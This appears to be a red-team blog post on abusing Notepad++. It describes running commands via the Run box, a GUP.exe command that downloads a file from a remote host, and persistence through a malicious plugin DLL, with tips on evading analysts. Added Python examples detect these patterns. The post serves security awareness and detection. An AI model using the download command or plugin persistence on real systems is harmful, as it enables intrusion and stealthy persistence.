Offensive Notepad++



Intro


Notepad++ is a pretty nice text editor, primarily for Windows, which boasts a large number of supported programming languages and a huge amount of customization in a small, minimal, and extensible package. Because of these features it's widely installed as a replacement for Windows' dismal default Notepad. This editor has so many features crammed into it that it has accidentally opened up some avenues for abuse by threat actors and red teamers alike. In this document I'll cover some useful (and less useful) features that can be abused to perform unintended actions, which could come in handy in the specific situations where Notepad++ happens to be installed.

Indirect Execution Via 'Run' Feature


So here's a bit of a strange one that I'm actually not sure is even useful at all. Recently at work, we had to respond to a domain compromise where the attacker gained RDP access to a workstation. Once authenticated, the attacker noticed that Notepad++ was installed and, instead of just opening cmd.exe to begin pasting their enumeration playbook, decided to open Notepad++, press F5 to open the Run box and run all of their enumeration through that. If you're confused, don't worry, so am I. From an EDR perspective this doesn't mask the activity at all, as at the end of the day an instance of cmd.exe is still spawned and executes an enumeration command. Not only this, but for some EDR providers cmd.exe being launched from Notepad++.exe will likely trigger some sort of 'cmd launched with suspicious parent' rule or something along those lines.

With this said, there is actually a nice synergy between this technique and the next one you're about to read that might keep you under the radar of a less experienced analyst.

Remote File Download Via Gup.exe


GUP.exe is located in C:\Program Files\Notepad++\updater and is a fork of wingup (a "Generic Updater running under Windows environment"). Notepad++ uses GUP.exe to fetch and install updates, and it works very well; however, there is a neat "Living Off The Land Binary" method where you can download a file from a remote location using this program with the following command:

GUP.exe -unzipTo "" "output_directory" "folder_name http://remote_location.com/file.exe 6a8dbafeec737018cb6729da64021d41d22a23a8a77d727a0b2e852f3eb93a33"

Note

The hash you see at the end of the command is required and should be the SHA256 checksum of the folder/file you're fetching.

Now, using this in isolation by just throwing it into cmd.exe would scream malicious activity; however, pairing it with the previously mentioned 'Run' feature makes it quite a bit harder to spot, as some Notepad++ plugins also utilize GUP.exe, allowing you to blend in with the noise a bit. A keen analyst should spot this pretty fast, and rules looking for web addresses in command line arguments should pick you up just as quickly, but a convincing domain name with what looks like a file that could be related to a plugin could be very nice.
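From the detection side, the two tells in the Run and GUP.exe sections are the parent/child relationship (a shell under notepad++.exe) and a URL on a GUP.exe -unzipTo command line. The following is an added example, not code from the original post, that runs those two rules over a handful of constructed process-creation events; the sample paths, URL and all-zero hash are made up, and the event field names are an assumption about your telemetry.

```python
import re

# Constructed sample process-creation events (not real telemetry), shaped like Sysmon
# Event ID 1 / typical EDR fields: image path, parent image path, command line.
NPP = r"C:\Program Files\Notepad++"
SAMPLE_EVENTS = [
    # cmd.exe spawned by notepad++.exe: how the F5 'Run' box shows up in telemetry.
    {"image": r"C:\Windows\System32\cmd.exe", "parent": NPP + r"\notepad++.exe",
     "cmdline": 'cmd /c "whoami /all"'},
    # GUP.exe -unzipTo with a URL, run from an interactive shell (URL and hash are placeholders).
    {"image": NPP + r"\updater\GUP.exe", "parent": r"C:\Windows\System32\cmd.exe",
     "cmdline": 'GUP.exe -unzipTo "" "C:\\Users\\Public" "tools http://example.invalid/file.exe ' + "0" * 64 + '"'},
    # GUP.exe started by Notepad++ itself with no URL on the command line: routine update check.
    {"image": NPP + r"\updater\GUP.exe", "parent": NPP + r"\notepad++.exe", "cmdline": "GUP.exe"},
    # Ordinary shell from explorer.exe: should produce no finding.
    {"image": r"C:\Windows\System32\cmd.exe", "parent": r"C:\Windows\explorer.exe", "cmdline": "cmd.exe"},
]

SHELLS = {"cmd.exe", "powershell.exe", "pwsh.exe", "wscript.exe", "cscript.exe"}
URL_RE = re.compile(r"https?://[^\s\"']+", re.IGNORECASE)


def basename(path: str) -> str:
    """Last path component, lower-cased, so matching is case-insensitive like NTFS."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def evaluate(event: dict) -> list:
    """Return human-readable findings for one process-creation event."""
    image, parent = basename(event["image"]), basename(event["parent"])
    cmdline = event["cmdline"]
    findings = []
    if image in SHELLS and parent == "notepad++.exe":
        findings.append("shell spawned by notepad++.exe (consistent with the F5 'Run' box)")
    if image == "gup.exe":
        url = URL_RE.search(cmdline)
        # The URL on the -unzipTo command line is the download primitive. The parent may
        # legitimately be notepad++.exe (plugins also use GUP.exe), so never key on parent alone.
        if "-unzipto" in cmdline.lower() and url:
            findings.append("GUP.exe -unzipTo fetching " + url.group(0))
        if parent in SHELLS:
            findings.append("GUP.exe launched by " + parent + " rather than notepad++.exe")
    return findings


def triage(events: list) -> list:
    """Return (event index, finding) pairs for a batch of events."""
    return [(i, f) for i, e in enumerate(events) for f in evaluate(e)]
```

Note that when GUP.exe is launched through the Run box its parent is notepad++.exe, so only the URL rule fires; that is exactly why the command-line check matters more than the parent check here.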

Persistence Via Plugin


Now we're into the good stuff, because my god this is pretty mental. So let's start with what a Notepad++ plugin is: to extend the functionality of Notepad++ you can download plugins to load into the program that let you perform extra functions, for example adding an HTML preview window or a code snippets editor (you can find a list of plugins here!).

Now you'll probably be slightly uncomfortable when, after downloading one of these plugins and unzipping the folder, you find it's just a .dll. You're probably seeing where this is going, but yes... Notepad++ will execute anything inside DllMain...

So here's what you have to do: download the Notepad++ Plugin Template and then open it in Visual Studio (or whatever IDE you use). Locate DllMain, which is in NppPluginDemo.cpp, and add whatever you want into DLL_PROCESS_ATTACH or into pluginInit() located in PluginDefinition.cpp. Compile this and then drop the DLL in:

C:\Program Files\Notepad++\plugins\NameOfPlugin\NameOfPlugin.dll

Note

The plugin must be in its own folder that shares the exact same name as the DLL inside it.

It's trivial to execute a Cobalt Strike stager through this or, since this is just C++, fetch a remote payload and directly inject it into another process. Now, until my C2 framework is in a position where I can show it off, please enjoy this dull and unimpressive calc pop:
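The loading rule in the note above (a plugin is only loaded from plugins\Name\Name.dll) also makes the persistence easy to audit: anything loadable that isn't in your baseline deserves a look. This added example, not code from the original post, hashes every DLL under a plugins directory and compares the loadable ones against an allowlist; the plugin names, file contents and the temp-dir layout are constructed, and in practice the allowlist would be built from a known-good install.

```python
import hashlib
import tempfile
from pathlib import Path


def sha256_of(path: Path) -> str:
    """SHA256 hex digest of a file, read in chunks."""
    digest = hashlib.sha256()
    with path.open("rb") as fh:
        for chunk in iter(lambda: fh.read(65536), b""):
            digest.update(chunk)
    return digest.hexdigest()


def audit_plugins(plugins_dir, allowlist):
    """Walk <plugins_dir>\\<Name>\\*.dll and return (folder, dll, sha256, reason) tuples.

    Notepad++ only loads <Name>\\<Name>.dll, so a loadable DLL whose hash is not in the
    baseline is the persistence case from the post; any other DLL is a stray file worth a look.
    """
    findings = []
    for folder in sorted(p for p in Path(plugins_dir).iterdir() if p.is_dir()):
        for dll in sorted(folder.glob("*.dll")):
            digest = sha256_of(dll)
            if dll.stem.lower() != folder.name.lower():
                reason = "DLL name does not match its folder (not loadable as a plugin; stray file)"
            elif digest.lower() not in allowlist:
                reason = "loadable plugin DLL not in the baseline allowlist"
            else:
                continue
            findings.append((folder.name, dll.name, digest, reason))
    return findings


def demo() -> list:
    """Build a constructed plugins tree in a temp dir and audit it (names and bytes are made up)."""
    root = Path(tempfile.mkdtemp())
    (root / "KnownGoodPlugin").mkdir()
    (root / "KnownGoodPlugin" / "KnownGoodPlugin.dll").write_bytes(b"baseline plugin bytes")
    (root / "DroppedPlugin").mkdir()
    (root / "DroppedPlugin" / "DroppedPlugin.dll").write_bytes(b"unknown plugin bytes")
    (root / "DroppedPlugin" / "helper.dll").write_bytes(b"stray file")
    (root / "Config").mkdir()  # a folder with no DLLs (e.g. plugin config) yields no findings
    # Baseline: hashes from a known-good install; here derived from the constructed file.
    allowlist = {sha256_of(root / "KnownGoodPlugin" / "KnownGoodPlugin.dll")}
    return audit_plugins(root, allowlist)
```

Point audit_plugins at C:\Program Files\Notepad++\plugins with a real baseline to run it against an actual install; the demo only exists to show the two finding types.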

Final Thoughts


Well, there we go: a small collection of interesting interactions you might be able to abuse on the off chance you see Notepad++ installed on a machine. To the threat actor who decided to run their enumeration through Notepad++'s Run function: maybe brush up on your opsec/evasion skills, as this really didn't do you any favours and was actually noisier than just executing cmd.exe from explorer.exe, which could have looked like admin activity and would draw less attention.

If you, the reader, find any other cool "features" of Notepad++ please do tweet me (@felixm_pw) your findings!